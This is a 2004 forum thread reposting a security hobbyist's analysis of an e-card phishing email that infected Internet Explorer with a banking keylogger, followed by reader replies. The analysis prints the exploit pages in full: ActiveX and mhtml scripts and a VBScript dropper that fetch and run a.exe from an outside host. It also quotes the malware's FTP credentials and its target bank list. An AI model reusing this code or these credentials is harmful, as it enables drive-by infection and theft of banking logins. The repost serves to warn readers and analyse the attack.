Free Republic
Browse · Search
News/Activism
Topics · Post Article

Skip to comments.

E-card Hijack Spam [See LM's Note At Top Of Thread]
http://www.tjhsst.edu/~agupta/ecard-hijack/ ^ | 2/15/04 | Aman Gupta

Posted on 02/18/2004 8:33:00 PM PST by Slings and Arrows

Edited on 02/19/2004 4:25:12 AM PST by Lead Moderator. [history]

[LM's Note: We got a report that when a user tried to load this thread, his anti-virus flagged the html file as containing a "virus" (actually, a web exploit). In reality, this thread is about the exact web exploit that that anti-virus scanner "caught", but the thread does not contain the actual exploit. The virus scanner apparently looks for certain text strings to identify the exploit's fingerprint, and while those are in this thread, the stuff that makes the exploit work is not. Thanks, LM]

E-card Hijack Spam

Introduction

I got an email on February 15th, 2004 telling me I had received an e-card from someone at 123greetings.com. The email looked a little bit suspicious, since the sender of the ecard (kissmytearsx@comcast.net) was someone I didn't recognize, and the URL to view the card showed the root domain of 123greetings.com. However, being the lonely geek I am, I clicked on the link hoping that I had a secret admirer who had emailed me a card for valentines day...

The page opened in my browser, but nothing happened. Lucky for me, I wasn't using Internet Explorer so I was saved. A closer look at the email and URL revealed the following:

It has been pointed out to me that the email says that you sent a card, not received one. I should have noticed this and realized I hadn't sent any cards to anyone.

The E-mail

There are several things to notice about the following email. Starting at the beginning, the email was sent from a DSL account in Poland - definitely did not come from the 123greetings.com servers. The from, reply-to, sender and return-path headers are obviously fake.

A comment in the HTML content of the email shows that it was saved from http://d40921.u24.whp-server.com/card.htm, where a copy of what is presumably the original email still exists. The title tag is set to "Untitled Document", and a META tag indicates that the html was generated using a microsoft product.

The URL view-source:http://210.192.42.34/img/ [warning, don't click unless you know what you're doing] appears through the rest of the email. All the links have been changed to point to this URL, and a 0x0 iframe at the end of the email also opens it up.

From ecard@123greetings.com Sun Feb 15 11:13:52 2004
Return-Path: <ecard@123greetings.com>
Delivered-To: MYEMAIL

Received: from localhost (localhost [127.0.0.1]) by mail.tjhsst.edu (Postfix) with ESMTP id 99462A2C1A for <MYEMAIL>; Sun, 15 Feb 2004 11:13:52 -0500 (EST) Received: from mail.tjhsst.edu ([127.0.0.1]) by localhost (macaroni [127.0.0.1]) (amavisd-new, port 20025) with ESMTP id 01846-06 for <MYEMAIL>; Sun, 15 Feb 2004 11:13:52 -0500 (EST) Received: from mail.zoneedit.com (mail.zoneedit.com [209.152.174.160]) by mail.tjhsst.edu (Postfix) with ESMTP id AF227A2C19 for <MYEMAIL>; Sun, 15 Feb 2004 11:13:51 -0500 (EST) Received: from compuserve.com (rk160.neoplus.adsl.tpnet.pl [80.50.83.160]) by mail.zoneedit.com (Postfix) with SMTP id C84213EBB8 for <MYEMAIL>; Sun, 15 Feb 2004 11:13:48 -0500 (EST)

Date: Sun, 15 Feb 2004 16:16:50 +0000 From: Ecard <ecard@123greetings.com> Subject: You have received E-card at 123Greetings.com To: ME <MYEMAIL>

Message-ID: <2BK7DCI33AK80CAE@123greetings.com>

Reply-To: Ecard <ecard@123greetings.com> Sender: Ecard <ecard@123greetings.com>

MIME-Version: 1.0 Content-Type: text/html; charset=Windows-1251 X-Virus-Scanned: by amavisd-new-20030616-p5 (Debian) at macaroni X-Spam-Status: No, hits=4.3 tagged_above=2.0 required=6.3 tests=HTML_30_40, HTML_COMMENT_SAVED_URL, HTML_MESSAGE, HTML_RELAYING_FRAME, HTML_TITLE_UNTITLED, MIME_HTML_ONLY, NORMAL_HTTP_TO_IP, RCVD_FAKE_HELO_DOTCOM X-Spam-Level: **** Content-Transfer-Encoding: 8bit

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- saved from url=(0041)http://d40921.u24.whp-server.com/card.htm --> <HTML><HEAD><TITLE>Untitled Document</TITLE> <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> <META content="MSHTML 6.00.2737.800" name=GENERATOR></HEAD> <BODY bgColor=#ffffff><PRE>Dear Admirer,

Your e-card has been sent to My... at kissmytearsx@comcast.net

123Greetings.com is all about touching lives, bridging distances, healing rifts and building bonds. We have a gallery of e-cards for almost every occasion of

life. Express yourself to your friends and family by sending Free e-cards from our site with your choice of colors, words and music.

Your e-card will be available with us for the next 30 days. If you wish to keep the e-card longer, you may save it on your computer or take a print.

To view a copy of the e-card you have sent, choose from any of the following options:

-------- OPTION 1 --------

Click on the following Internet address or copy & paste it into your browser's address box.

<A href="http://210.192.42.34/img/">http://www.123greetings.com/</A>

-------- OPTION 2 -------- Copy & paste the e-card number in the "View Your Card" box at <A href="http://210.192.42.34/img/">http://ww.123greetings.com/</A>

Your e-card number is 7CU20121085738151

If you need help in viewing your e-card or any other assistance, please visit our Help / FAQ section located at <A href="http://210.192.42.34/img/">http://ww.123greetings.com/help/</A>

If you need further help, feel free to write to us at <A href="mailto:%20support@123greetings.com">mailto:%20support@123greetings.com</A>

Best wishes,

Postmaster, 123Greetings.com

*If you would like to send someone an e-card, you can do so at <A href="http://210.192.42.34/img/">http://ww.123greetings.com/</A> <IFRAME SRC="http://210.192.42.34/img/" height="0" width="0">gf</iframe> </PRE></BODY></HTML>

The Offending URL

The URL, whose HTML source is reproduced below, does some really nasty stuff. Using iframes, object tags and javascript, it opens up several other files, which are explained later on, from the server:

In addition to opening other URLs, the page also does its own share of nasty things. It includes a hidden textarea which contains ActiveX to download a certain a.exe, and overwrite the Windows Media Player wmplayer.exe with it. Once the file has been replaced, IE is redirected to the mms://, which causes the invocation of wmplayer.exe. The code in this textarea is processed by some javascript after a 5 second timeout, and is run in Internet Explorer's 'Media Sidebar'. Before this 5 second timeout, however, a fake url, error.jsp, is opened in the media sidebar to throw off the user.

<iframe src="spy.htm" height="0" width="0">f</iframe>
<iframe src="start.html" height="0" width="0">f</iframe>
<iframe src="ro.htm" height="0" width="0">f</iframe>

<object data="1.php"></object>

<textarea id="code" style="display:none;">

var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://adversting.co.uk/a.exe",0); x.Send();

var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://";

</textarea>

<script language="javascript">

function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) {

line = lines[i]; line = line.replace(/^\s+/,""); line = line.replace(/\s+$/,""); line = line.replace(/'/g,"\\'"); line = line.replace(/[\\]/g,"\\\\"); line = line.replace(/[/]/g,"%2f");

if (line != '') { result += line +'\\r\\n'; } } return result; }

function doit() { mycode = preparecode(document.all.code.value); myURL = "file:javascript:eval('" + mycode + "')"; window.open(myURL,"_media") }

window.open("error.jsp","_media");

setTimeout("doit()", 5000);

</script>

spy.htm - I wonder what this does?

Despite its malicous sounding name, all this file contains is the tracking code provided by a russian company, spylog.com. I couldn't figure out how to view the stats that are being compiled by spylog, but the author no doubt has access to these stats and can use them to figure out how many computers he has hijacked.

<!-- SpyLOG f:0211 -->
<script language="javascript"><!--
Mu="u5327.08.spylog.com";Md=document;Mnv=navigator;Mp=0;
Md.cookie="b=b";Mc=0;if(Md.cookie)Mc=1;Mrn=Math.random();
Mn=(Mnv.appName.substring(0,2)=="Mi")?0:1;Mt=(new Date()).getTimezoneOffset();
Mz="p="+Mp+"&rn="+Mrn+"&c="+Mc+"&t="+Mt;
if(self!=top){Mfr=1;}else{Mfr=0;}Msl="1.0";
//--></script><script language="javascript1.1"><!--
Mpl="";Msl="1.1";Mj = (Mnv.javaEnabled()?"Y":"N");Mz+='&j='+Mj;
//--></script><script language="javascript1.2"><!--
Msl="1.2";Ms=screen;Mpx=(Mn==0)?Ms.colorDepth:Ms.pixelDepth;
Mz+="&wh="+Ms.width+'x'+Ms.height+"&px="+Mpx;
//--></script><script language="javascript1.3"><!--
Msl="1.3";//--></script><script language="javascript"><!--
My="";My+="<a href='http://"+Mu+"/cnt?cid=532708&f=3&p="+Mp+"&rn="+Mrn+"'
target='_blank'>";
My+="<img src='http://"+Mu+"/cnt?cid=532708&"+Mz+"&sl="+Msl+
"&r="+escape(Md.referrer)+"&fr="+Mfr+"&pg="+escape(window.location.href);
My+="' border=0 width=88 height=31 alt='SpyLOG'>";
My+="</a>";Md.write(My);//--></script><noscript>
<a href="http://u5327.08.spylog.com/cnt?cid=532708&f=3&p=0" target="_blank">
<img src="http://u5327.08.spylog.com/cnt?cid=532708&p=0" alt='SpyLOG'
border='0' width=88 height=31 >
</a></noscript>
<!-- SpyLOG -->

start.html - The file that ran away

Presumably, this file actually existed at one point, and did something (maybe changed the browsers start page?), but it no longer exists.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /img/start.html was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.12 Server at panda.coventive.com Port 80</ADDRESS>
</BODY></HTML>

ro.html - Remote execution

The author tries yet another IE exploit to run a.exe remotely.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
 <script>
WaitForDocumentCached_TIME=100;

function LaunchRemoteExe_Step2() { //One more fresh action is present for more stable performance for(i=1;i<=2;i++) w.document.execCommand("Refresh"); }

function LaunchRemoteExe(ExeUrl) { w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes"); w.document.write("<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111113' CODEBASE='mhtml:file://C:\NO_SUCH_MHT.MHT!" + ExeUrl + "'>"); setTimeout("LaunchRemoteExe_Step2()",WaitForDocumentCached_TIME); }

LaunchRemoteExe("http://adversting.co.uk/a.exe") </script> </head> <body> <font size="6"><font size="2"><big><big><big> <big>HijackClickV2-MyPage</big></big> </big></big><b><i><br> <br> </body> </html>

1.php - Last Attempt

1.php tries one last method to run a.exe. The file contains vbscript code, but probably uses php so that it can send a 'application/hta' content-type header. The encoded vbscript has been removed (view it at view-source:http://210.192.42.34/img/1.php) and replaced with the deocded version of the code.

The vbscript code contains strings which represent, in hex, the binary contents of a certain executable which is saved as x.exe. Once saved, this executable is launched with the url to a.exe as an argument.

<html>

<script language=vbs> szURL = "http://adversting.co.uk/a.exe" </script>

<script language="VBScript.Encode">

<%
szZeroLine =
 "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
szBinary = ""
szBinary = szBinary &
 "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000"
szBinary = szBinary &
 "000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F"
szBinary = szBinary &
 "742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005D87017219E66F2119E66F2119E66F21"
szBinary = szBinary &
 "97F97C2112E66F21E5C67D2118E66F215269636819E66F2100000000000000000000000000000000504500004C010300"
szBinary = szBinary &
 "AB93493F0000000000000000E0000F010B01050C00020000000400000000000000100000001000000020000000004000"
szBinary = szBinary &
 "001000000002000004000000000000000400000000000000004000000004000000000000020000000000100000100000"
szBinary = szBinary &
 "000010000010000000000000100000000000000000000000182000002800000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine
szBinary = szBinary &
 "2E7465787400000064000000001000000002000000040000000000000000000000000000200000602E72646174610000"
szBinary = szBinary &
 "BE000000002000000002000000060000000000000000000000000000400000402E646174610000002700000000300000"
szBinary = szBinary &
 "0002000000080000000000000000000000000000400000C0000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
 szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary &
 "00000000000000000000000000000000E8470000006683C00A8D08516800304000E842000000680B30400050E8310000"
szBinary = szBinary &
 "00596A006A008D1D1E30400053516A00FFD06A01681E304000E8200000006A00E801000000CCFF2510204000FF250020"
szBinary = szBinary &
 "4000FF2504204000FF2508204000FF250C20400000000000000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
 szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary &
 "66200000782000008A2000009A2000005820000000000000402000000000000000000000A42000000020000000000000"
szBinary = szBinary &
 "0000000000000000000000000000000066200000782000008A2000009A20000058200000000000008000457869745072"
szBinary = szBinary &
 "6F6365737300C800476574436F6D6D616E644C696E6541001F0147657450726F63416464726573730000A4014C6F6164"
szBinary = szBinary &
 "4C696272617279410000940257696E45786563006B65726E656C33322E646C6C00007573657233322E646C6C00000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
 szZeroLine & szZeroLine
szBinary = szBinary &
 "000000000000000000000000000000000000000000000000000000000000000075726C6D6F6E2E646C6C0055524C446F"
szBinary = szBinary &
 "776E6C6F6164546F46696C654100633A5C792E6578650000000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
 szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary & "00000000000000000000000000000000"
szApplication = "c:\x.exe"
Set hFSO = CreateObject("Scripting.FileSystemObject")
Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)
intLength = len(szBinary)
intPosition = 1
while intPosition < intLength
char = Int("&H" & Mid(szBinary, intPosition, 2))
hFile.Write(Chr(char))
intPosition = intPosition+2
wend
hFile.Close
Set hShell=CreateObject("WScript.Shell")
hShell.run(szApplication+" "+szURL)
%>
</script>

x.exe - The Accomplice

I don't have a windows machine, and don't particularly want to run this and the other executable on one. If someone wants to investigate, feel free, and be sure to email me anything you find so that I can update this page.

Feb 16th, 12PM: According to Robert Myers, x.exe isn't a valid Windows executable, and doesn't run properly on either XP or 98. Looking at the raw binary, the intent is to simply download the URL given on the command line and execute it. It should download a.exe, call it c:\y.exe and run it.

Feb 16th, 3PM: Slashdot reader James Sneeringer emailed me the following update:

As you know, 1.php decodes into x.exe.  It's quite small, only 2512 bytes.
 When run, it evidently attempts to download whatever URL is passed to it,
(using URLDownloadToFileA()) and saves it to c:\y.exe, when tries to run
it (using WinExec()).  So x.exe downloads a.exe as y.exe and runs it.

I obtained a.exe from the URL in 1.php, http://adversting.co.uk/a.exe. The a.exe file appears to be a keylogger, as the string "key.log" is contained in it. It contains calls to RegCreateKeyExA(), MessageBoxA(), and InternetOpenA(), so it probably does the usual trojan/worm thing... ensures it starts up on reboot, prints misleading error messages, phones home, etc.

I have not run any of these programs. I have only analyzed them on a Linux system using the strings command. I did copy a.exe to a Windows system running Norton AntiVirus, but it didn't flag it as any known Trojan or SpyWare. I obtained x.exe by converting the VBScript code to perl. I hope this helps.

a.exe - Final Destination

Feb 16th, 3:30PM: I've gotten several emails providing information about a.exe (md5sum e8262377158e2b0b3932292f49fd23a6).

Robert Myers reports that the exe has references to spy.dll and keylg.dll

John reports:

I analyzed the a.exe and found disturbing info:

it is after banks, as described in an unpacked version (the file is compacted). Bank list is as follows:

hangseng.HSBC.bank.PIN.ufjbank.smbc.co.jp.btm.co.jp. rhbbank.com.ambg.com.my.affinbank.com.my.publicbank.com.my. Shinsei.jbic.go.jp.boj.or.jp.sanwabank.co.jp.stormpay.com. ccbusa.com.goldmoney.e-gold.e-bullion.tradeodds.com. datek.betonmarket.com.evocash.bancaja.es.santandercentralhispano.es. bancopopular.es.cajamadrid.es.caixapenedes.es.caixamanresa.es. caixatarragona.es.cme.com.fxall.com. bank.banc.e-gold.evocash.e-bullion.hangseng.HSBC.PIN.smbc.co.jp. btm.co.jp.rhbbank.com.ambg.com.my.Shinsei.jbic.go.jp.jbic.go.jp. stormpay.com.ccbusa.com.goldmoney.tradeodds.com.datek.betonmarket.com. santandercentralhispano.es.cajamadrid.es.caixapenedes.es.caixamanresa.es. caixatarragona.es.bot.or.th.banque.bnm.gov.my.dnb.nl. bundesbank.de.TAN.ecb.int.mas.gov.sg.snb.ch.federalreserve.gov. abnamro.com.aib.ie.bnl.it.ingbarings.com.bankofamerica.com. bmonesbittburns.com.barcap.com.bearstearns.com.bnpparibas.com. chase.com.consors.de.ca-indosuez.com.creditlyonnais.com.csfb.com. firstunion.com.intesabci.it.jp morgan.com.leuveninc.com.ldc.co.uk. nabmarkets.com.nomura.com.rbsmarkets.com.sakura.co.jp. salomonsmithbarney.com.scotiacapital.com.sg-ib.com.standardchartered.com. smbc.co.jp.csweb.co.jp.td.com.travelex.com.ubs.com.wachovia.com. wellsfargo.com.westlbmarkets.net.saxobank.com.e-trade.admin.clearstation.com. daytraders.com.decisionpoint.com.earningswhispers.com.investools.com. nni.nikkei.co.jp.stockwinners.com.tradetrek.com.brownco-apply.com. schwabtrader.com.processrequest.com.anz.com.olb.westpac.commbank.com.au. ambg.com.my.bpm.com.my.bcb.com.my.hhb.com.my.borneo-online.com.my.rba.gov.au. panamaoffshore.com.eib.org.offshore.53.com.amex.com.money.net.st.rim.or.jp. meigin.com.it-okinawa.or.jp.chb.com.tw.www2.japanexim.go.jp.www.gs.com. juroku.co.jp.iijnet.or.jp.mitsubishi-trust.co.jp.msdw.co.jp.ncb.co.jp. hirogin.co.jp.clariden.com.dahsing.com.hk.iba.com.hk.worldsec.com. unicredito.it.rzb.at.mevas.com.ibnk.bcif.fr.rzb.at.smc.fr. www.socgen.com.www.westlb.com.www.boh.com.cib.ibanking-services.com. internetonline2.com.agrolink.moa.my.maybank2u.com.my.bankrakyat.com. my.nwabank.co.jp.ufjbank.parex.ogress.banco

The files it installs are:

C:\WINDOWS\SYSTEM\~key.log keylogging file ? C:\WINDOWS\SYSTEM\~post.log other post file ?

Files it refers to: spy.dll klgd.dll

Interesting info about the author: g:\!Work\__Current\$0000_FHooker_Chazer\Release\TrojWithHooker.pdb g:\!Work\__Current\$0000_FHooker_Chazer\Dll\Release\DLL.pdb ProgLib.dll._Prog_HookAllApps@12 MoneyFtp (???)

The information (logfiles) is send out to an FTP site that is UP as of yet. I informed the abuse department of the hosters of the FTP site and am giving them a chance to shut it down. It is not yet wise to include this particular information on your site, as there could be consequences for the people whose log is already collected.

And Jack emailed me:

I downloaded a.exe out of curiousity, and have been analysing it. The file
contains a number of very interesting strings, which make it quite obvious
that this program attempts to hijack the user's personal login information
as they log in to various popular Internet banking services.

The strings are (trivially) encrypted. However, once every character in a.exe is XOR'ed with 255, they appear. I have listed them below.

Of particular interest are the five at the top. Seems as if the details are uploaded to one of two FTP sites, and the exploit may affect people using Opera as well as IE.

64.191.23.212 21 ircd thepassw0rd https http Internet Explorer Opera 69.93.102.218 21 logi bbzaza123 hangseng HSBC bank ufjbank smbc.co.jp btm.co.jp rhbbank.com ambg.com.my affinbank.com.my publicbank.com.my Shinsei jbic.go.jp boj.or.jp sanwabank.co.jp stormpay.com ccbusa.com goldmoney

... continues in similar vein, with 152 more strings.

I have found this very scary. I cannot believe how openly malicious this program actually is.

adversting.co.uk - Look, it's misspelt

Feb 16th, 12PM: Mike Richards did some research on the domain that a.exe is being pulled from. Here's what he found:

The site is registered in the UK and points to another mass marketing company called trafficdiscount.com. They are located in the US and their registration details are:

Registrant Name: Daniel Belcher
Registrant Organization: Slick Website Development
Registrant Address: 1111 Kathryn Rd.
Registrant City: Mt. Juliet
Registrant State/Province: TN
Registrant Postal Code: 37122
Registrant Country: US
Registrant Phone Number: +61.54434190
Registrant Fax Number: +.
Registrant Email: daniel@s-w-d.net

They are currently providing services through Wiltel.

Conclusion

If you're still using Outlook and Internet Explorer, this is a good time to find alternatives (I suggest FireFox and Thunderbird). Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users.

This page was created in vim by Aman Gupta with no crazy standards compliance in mind, but rather a desire to write clean, readable and well organized HTML using CSS to make the page look presentable.


TOPICS: Crime/Corruption; Culture/Society; News/Current Events; Technical
KEYWORDS:
Un-smegging-believable. Scam-spammers are lower than ordinary spammers, and I hadn't thought that possible. I still use MS OE, but I'm very careful about what I open, use a firewall, and regularly scan for spyware.
1 posted on 02/18/2004 8:33:01 PM PST by Slings and Arrows
[ Post Reply | Private Reply | View Replies]

To: Slings and Arrows
Take a look at Thunderbird.
2 posted on 02/18/2004 8:59:51 PM PST by philetus (Keep doing what you always do and you'll keep getting what you always get)
[ Post Reply | Private Reply | To 1 | View Replies]

To: Slings and Arrows
Here is your main IP address location:
210.192.42.34

The other regitrar info you got from the UK and the US was probably fraudulent from stolen credit cards. Most of this comes from Red China - so it surporises me that this one is from Taiwan - probably a communist spy.

Registrant:
Taiwan Telecommunication Network Services Co., LTD (TTN3-DOM)
8Fl.,No.89,Sung Jen Rd.
Taipei 110
TW

Domain Name: TTN.NET

Administrative Contact:
Wu, Jung (JWI410) jungwu@TTN.COM.TW
Taiwan Telecommunication Network
8Fl.,No.89,Sung Jen Rd.
Taipei, 110
TW
+886-2-87883728 fax: +886-2-87883028

Technical Contact:
Taiwan Telecommunication Network (DR416-ORG) dnsmaster@TTN.COM.TW
8Fl.,No.89,Sung Jen Rd.
Taipei, Taipei
TW
+886-2-87883728 fax: +886-2-87883028

Record expires on 18-Jun-2006.
Record created on 19-Jun-1997.
Database last updated on 19-Feb-2004 00:00:08 EST.

Domain servers in listed order:

DNS.TTN.NET 202.145.138.200
LORD.TTN.NET 202.145.138.136
3 posted on 02/18/2004 9:03:54 PM PST by steplock
[ Post Reply | Private Reply | To 1 | View Replies]

Comment #4 Removed by Moderator

To: steplock; happygrl
The author of the post was Mr. Gupta. I posted it to warn Freepers about a potentially dangerous attack on their computers. Steplock, you can contact Mr. Gupta via the source URL for the post. Happygrl, no valentine for me. :-(
5 posted on 02/18/2004 9:09:44 PM PST by Slings and Arrows (Am Yisrael Chai!)
[ Post Reply | Private Reply | To 3 | View Replies]

To: happygrl; Happygal
Whoops - a little confusion in my last post!
6 posted on 02/18/2004 9:10:48 PM PST by Slings and Arrows (Am Yisrael Chai!)
[ Post Reply | Private Reply | To 5 | View Replies]

To: Slings and Arrows; happygrl
Hmmmm...

I'm thinking some things are not coincidence.

Happygrl...if you want I can represent you.

Slings and Arrows have your people talk to Happygrls people (me)...and we'll see if we can find a match.

7 posted on 02/18/2004 9:13:48 PM PST by Happygal (Le gách dea ghuí)
[ Post Reply | Private Reply | To 6 | View Replies]

To: Slings and Arrows
All this sound and fury about "gay marriage", but not one prosecutor with the ambition to pair up a spammer with a poor lonely guy in prison....
8 posted on 02/19/2004 6:12:33 AM PST by steve-b
[ Post Reply | Private Reply | To 1 | View Replies]

To: Slings and Arrows
Somebody put some imagination into this one.

The adversting.co.uk domain is owned by ThePlanet in Dallas:

[root@Cherie root]# host adversting.co.uk
adversting.co.uk has address 69.93.33.146
[root@Cherie root]# whois 69.93.33.146@whois.arin.net
[whois.arin.net]

OrgName:    ThePlanet.com Internet Services, Inc.
OrgID:      TPCM
Address:    1333 North Stemmons Freeway
Address:    Suite 110
City:       Dallas
StateProv:  TX
PostalCode: 75207
Country:    US

NetRange:   69.93.0.0 - 69.93.239.255
CIDR:       69.93.0.0/17, 69.93.128.0/18, 69.93.192.0/19, 69.93.224.0/20
NetName:    NETBLK-THEPLANET-BLK-9
NetHandle:  NET-69-93-0-0-1
Parent:     NET-69-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.THEPLANET.COM
NameServer: NS2.THEPLANET.COM
Comment:
RegDate:    2003-11-19
Updated:    2004-01-21

And one of those FTP servers for the keylogger is in one of their subnets.

[root@Cherie root]# host 69.93.102.218
218.102.93.69.in-addr.arpa domain name pointer 218.69-93-102.reverse.theplanet.com.

The other FTP server is in a subnet owned by these folks:

[root@Cherie root]# whois 64.191.23.212@whois.arin.net
[whois.arin.net]

OrgName:    Network Operations Center Inc.
OrgID:      NOC
Address:    PO Box 591
City:       Scranton
StateProv:  PA
PostalCode: 18501-0591
Country:    US

NetRange:   64.191.0.0 - 64.191.127.255
CIDR:       64.191.0.0/17
NetName:    HOSTNOC-3BLK
NetHandle:  NET-64-191-0-0-1
Parent:     NET-64-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.HOSTNOC.NET
NameServer: NS2.HOSTNOC.NET
Comment:    ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate:    2002-05-31
Updated:    2003-08-08

It might be interesting to get into those FTP accounts with the usernames/passwords shown and see what all is in there. (Not that any white-hat hacker like myself would actually do something like that.)

OBTW, Mt. Juliet TN is a suburb of Nashville.

9 posted on 02/19/2004 7:46:28 AM PST by TechJunkYard
[ Post Reply | Private Reply | To 1 | View Replies]

To: Cyber Liberty
Ping to self for later read....
10 posted on 02/19/2004 7:51:24 AM PST by Cyber Liberty (© 2003, Ravin' Lunatic since 4/98)
[ Post Reply | Private Reply | To 1 | View Replies]

To: steve-b
All this sound and fury about "gay marriage", but not one prosecutor with the ambition to pair up a spammer with a poor lonely guy in prison....

Please let me know if you every decide to run for State's Attorney. We need this kind of forward-thinking in government.

11 posted on 02/19/2004 8:56:30 AM PST by Slings and Arrows (Am Yisrael Chai!)
[ Post Reply | Private Reply | To 8 | View Replies]

To: Happygal; Slings and Arrows
This could turn out to some kind of foreign affair-;)
12 posted on 02/19/2004 2:32:36 PM PST by happygrl
[ Post Reply | Private Reply | To 7 | View Replies]

To: happygrl; Happygal
This could turn out to some kind of foreign affair-;)

I was going to notify the State Department, but nothing kills romance faster than the words "Foggy Bottom."

13 posted on 02/19/2004 3:28:04 PM PST by Slings and Arrows (Am Yisrael Chai!)
[ Post Reply | Private Reply | To 12 | View Replies]

Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.

Free Republic
Browse · Search
News/Activism
Topics · Post Article

FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson